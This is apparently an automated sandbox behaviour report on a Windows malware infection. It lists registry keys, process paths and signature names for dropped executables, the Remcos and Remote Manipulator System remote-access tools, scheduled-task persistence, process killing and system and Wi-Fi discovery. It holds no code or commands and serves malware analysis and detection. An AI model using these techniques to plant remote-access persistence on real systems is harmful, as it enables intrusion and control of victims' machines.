| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\piotjhjadkaw.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\curl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\vcredist_x86.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\jy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\kisloyat.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
System Network Configuration Discovery: Wi-Fi Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters | C:\Windows\system32\vssvc.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters | C:\Windows\system32\vssvc.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr | C:\Windows\system32\vssvc.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 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 | C:\Windows\system32\vssvc.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\system32\vssvc.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key security queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\systeminfo.exe | N/A |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\systeminfo.exe | N/A |
GoLang User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\System32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\TektonIT | C:\Windows\SysWOW64\regedit.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\TektonIT\Remote Manipulator System\Host\Parameters\General = [data elided] | C:\Windows\SysWOW64\regedit.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\TektonIT\Remote Manipulator System\Host\Parameters | C:\Windows\SysWOW64\regedit.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={A12D8F7C-D7F5-483B-B90C-BCC15D5FB2ED}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\ieframe.dll,-5723 = "The Internet" | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\System32\dllhost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\TektonIT\Remote Manipulator System\Host\Parameters | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\TektonIT\Remote Manipulator System\Host\Parameters\FUSClientPath = "C:\\Windows\\SysWOW64\\ruts\\rfusclient.exe" | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1734027696" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1" | C:\Windows\system32\sihost.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Runs .reg file with regedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\regedit.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\Remcos\remcos.exe | N/A |
| N/A | N/A | \??\c:\program files (x86)\internet explorer\iexplore.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe | N/A |
